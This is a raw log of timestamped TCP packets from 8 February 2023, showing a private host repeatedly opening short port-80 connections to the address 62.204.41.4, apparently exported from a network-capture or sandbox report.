                                                                    Feb 8, 2023 21:32:46.151772022 CET5001380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.213291883 CET805001362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:46.213383913 CET805001262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:46.213422060 CET5001380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.213452101 CET5001280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.214238882 CET5001380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.276012897 CET805001362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:46.280585051 CET805001362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:46.280817986 CET5001380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.400895119 CET5001480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.401942968 CET5001380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.461770058 CET805001462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:46.462007046 CET5001480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.463574886 CET805001362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:46.463762999 CET5001380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.467797041 CET5001480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.528615952 CET805001462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:46.531321049 CET805001462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:46.532309055 CET5001480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.634391069 CET5001480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.635104895 CET5001580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.695317984 CET805001462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:46.697637081 CET805001562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:46.697875023 CET5001480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.697941065 CET5001580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.699251890 CET5001580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.761868954 CET805001562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:46.764550924 CET805001562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:46.767467976 CET5001580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.903387070 CET5001580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.904328108 CET5001680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.965970039 CET805001662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:46.966022015 CET805001562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:46.966228008 CET5001580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.966726065 CET5001680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.966726065 CET5001680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.028331041 CET805001662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:47.030981064 CET805001662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:47.031251907 CET5001680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.134742022 CET5001680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.140832901 CET5001780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.196630001 CET805001662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:47.196758986 CET5001680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.203432083 CET805001762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:47.203668118 CET5001780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.204140902 CET5001780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.266551971 CET805001762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:47.270333052 CET805001762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:47.270509958 CET5001780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.395215034 CET5001780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.396006107 CET5001880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.457878113 CET805001862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:47.457921982 CET805001762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:47.458152056 CET5001780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.458753109 CET5001880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.458753109 CET5001880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.520539045 CET805001862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:47.523410082 CET805001862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:47.523659945 CET5001880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.634823084 CET5001880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.635812998 CET5001980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.696763992 CET805001862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:47.696949959 CET5001880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.697202921 CET805001962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:47.697346926 CET5001980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.697839022 CET5001980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.759274006 CET805001962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:47.762049913 CET805001962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:47.762224913 CET5001980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.868542910 CET5001980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.871040106 CET5002080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.930974007 CET805001962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:47.931169987 CET5001980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.932406902 CET805002062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:47.932557106 CET5002080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.936217070 CET5002080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:47.997812033 CET805002062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.005727053 CET805002062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.005903959 CET5002080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.119713068 CET5002080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.120980024 CET5002180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.181396961 CET805002062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.181601048 CET5002080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.182189941 CET805002162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.182378054 CET5002180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.182809114 CET5002180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.244066000 CET805002162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.248092890 CET805002162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.248298883 CET5002180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.369044065 CET5002180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.369767904 CET5002280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.430407047 CET805002262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.430480957 CET805002162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.430632114 CET5002180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.430685043 CET5002280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.431713104 CET5002280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.492407084 CET805002262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.495898962 CET805002262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.496043921 CET5002280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.603465080 CET5002280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.604393959 CET5002380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.664244890 CET805002262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.664442062 CET5002280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.666182041 CET805002362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.666357040 CET5002380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.666868925 CET5002380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.728674889 CET805002362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.731539965 CET805002362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.731765985 CET5002380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.838397026 CET5002380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.839329958 CET5002480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.898802996 CET805002462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.898937941 CET5002480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.900331020 CET805002362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.900466919 CET5002380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.907601118 CET5002480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:48.967211962 CET805002462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.970055103 CET805002462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:48.970247984 CET5002480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:49.139190912 CET5002480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:49.140170097 CET5002580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:49.228382111 CET805002562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:49.228532076 CET5002580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:49.229371071 CET805002462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:49.229460955 CET5002480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:49.239222050 CET5002580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:49.345937967 CET805002562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:49.346138000 CET5002580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:02.636818886 CET5005480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:02.697544098 CET805005362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:02.697695017 CET5005380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:02.698215008 CET805005462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:02.698316097 CET5005480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:02.698713064 CET5005480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:02.762032986 CET805005462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:02.764348984 CET805005462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:02.764497995 CET5005480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:02.888017893 CET5005480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:02.899146080 CET5005580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:02.949724913 CET805005462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:02.949839115 CET5005480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:02.961796045 CET805005562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:02.961971998 CET5005580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:02.962291002 CET5005580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.024677992 CET805005562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:03.026889086 CET805005562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:03.027008057 CET5005580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.135333061 CET5005580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.136617899 CET5005680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.197896957 CET805005662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:03.197949886 CET805005562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:03.198069096 CET5005680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.198090076 CET5005580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.201021910 CET5005680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.262391090 CET805005662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:03.302412033 CET805005662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:03.302540064 CET5005680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.422574043 CET5005680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.423543930 CET5005780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.484114885 CET805005662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:03.484246969 CET5005680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.485023022 CET805005762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:03.485122919 CET5005780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.487998962 CET5005780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.549572945 CET805005762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:03.551975012 CET805005762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:03.552077055 CET5005780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.677181959 CET5005780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.678045034 CET5005880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.738480091 CET805005862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:03.738784075 CET805005762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:03.738920927 CET5005780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.740533113 CET5005880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.745857954 CET5005880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.807343960 CET805005862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:03.809408903 CET805005862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:03.814233065 CET5005880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.916946888 CET5005880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.917948008 CET5005980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.977575064 CET805005862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:03.978396893 CET805005962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:03.978712082 CET5005880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.978732109 CET5005980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:03.983890057 CET5005980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.044436932 CET805005962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:04.048372030 CET805005962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:04.048667908 CET5005980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.155386925 CET5005980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.156167984 CET5006080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.216110945 CET805005962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:04.216263056 CET5005980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.218568087 CET805006062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:04.218714952 CET5006080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.219259024 CET5006080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.281656981 CET805006062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:04.284405947 CET805006062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:04.284567118 CET5006080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.402323008 CET5006080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.403276920 CET5006180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.464035988 CET805006162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:04.464173079 CET5006180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.464646101 CET5006180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.464745998 CET805006062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:04.464839935 CET5006080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.525294065 CET805006162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:04.527714014 CET805006162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:04.529038906 CET5006180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.636516094 CET5006180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.638200998 CET5006280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.697437048 CET805006162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:04.697607994 CET5006180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.698717117 CET805006262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:04.698837042 CET5006280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.699485064 CET5006280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.760278940 CET805006262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:04.762595892 CET805006262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:04.762689114 CET5006280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.890798092 CET5006280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.891676903 CET5006380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.951616049 CET805006262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:04.951812029 CET5006280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.953151941 CET805006362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:04.953305960 CET5006380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:04.954076052 CET5006380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.015554905 CET805006362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.018045902 CET805006362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.018198013 CET5006380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.137306929 CET5006380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.138092995 CET5006480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.199048996 CET805006362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.199188948 CET5006380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.200293064 CET805006462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.200426102 CET5006480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.202732086 CET5006480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.265052080 CET805006462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.269459009 CET805006462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.269664049 CET5006480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.386318922 CET5006480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.387274027 CET5006580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.448682070 CET805006562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.448731899 CET805006462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.448920965 CET5006580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.448970079 CET5006480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.449264050 CET5006580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.510472059 CET805006562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.513484001 CET805006562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.513619900 CET5006580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.632607937 CET5006580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.633253098 CET5006680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.692837954 CET805006662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.693042040 CET5006680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.693953037 CET805006562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.694051027 CET5006580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.694509029 CET5006680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.754111052 CET805006662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.756572008 CET805006662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.756731033 CET5006680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.870095968 CET5006680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.870928049 CET5006780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.929697990 CET805006662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.929866076 CET5006680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.931416035 CET805006762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.931525946 CET5006780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.932411909 CET5006780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:05.993002892 CET805006762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.995294094 CET805006762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:05.995481014 CET5006780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.104420900 CET5006780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.105492115 CET5006880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.165141106 CET805006762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:06.165219069 CET5006780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.166996956 CET805006862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:06.167098045 CET5006880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.167681932 CET5006880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.229846954 CET805006862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:06.233010054 CET805006862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:06.233169079 CET5006880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.379968882 CET5006880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.381660938 CET5006980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.442853928 CET805006862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:06.442991018 CET805006962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:06.443023920 CET5006880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.445751905 CET5006980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.449832916 CET5006980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.511605024 CET805006962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:06.514261007 CET805006962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:06.514380932 CET5006980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.620476007 CET5006980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.625308037 CET5007080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.682015896 CET805006962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:06.682749987 CET5006980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.686825991 CET805007062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:06.688998938 CET5007080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.689347982 CET5007080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.750761032 CET805007062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:06.753258944 CET805007062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:06.753810883 CET5007080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.870714903 CET5007080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.885662079 CET5007180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.932506084 CET805007062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:06.932641029 CET5007080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.945233107 CET805007162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:06.945350885 CET5007180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:06.945888042 CET5007180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.005474091 CET805007162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:07.008430958 CET805007162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:07.008693933 CET5007180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.120263100 CET5007180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.121148109 CET5007280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.180114031 CET805007162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:07.181231976 CET5007180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.182775021 CET805007262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:07.182930946 CET5007280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.195107937 CET5007280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.258120060 CET805007262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:07.262188911 CET805007262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:07.266967058 CET5007280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.371933937 CET5007280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.372900009 CET5007380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.433847904 CET805007262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:07.433996916 CET5007280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.435508966 CET805007362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:07.435641050 CET5007380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.436064959 CET5007380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.504033089 CET805007362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:07.504116058 CET805007362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:07.504282951 CET5007380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.620975971 CET5007380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.621777058 CET5007480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.682729006 CET805007462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:07.683739901 CET805007362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:07.683942080 CET5007380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.683973074 CET5007480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.684649944 CET5007480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.745223045 CET805007462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:07.747404099 CET805007462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:07.749170065 CET5007480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.855371952 CET5007480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:07.856115103 CET5007580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:17.060749054 CET805010262.204.41.4192.168.2.3
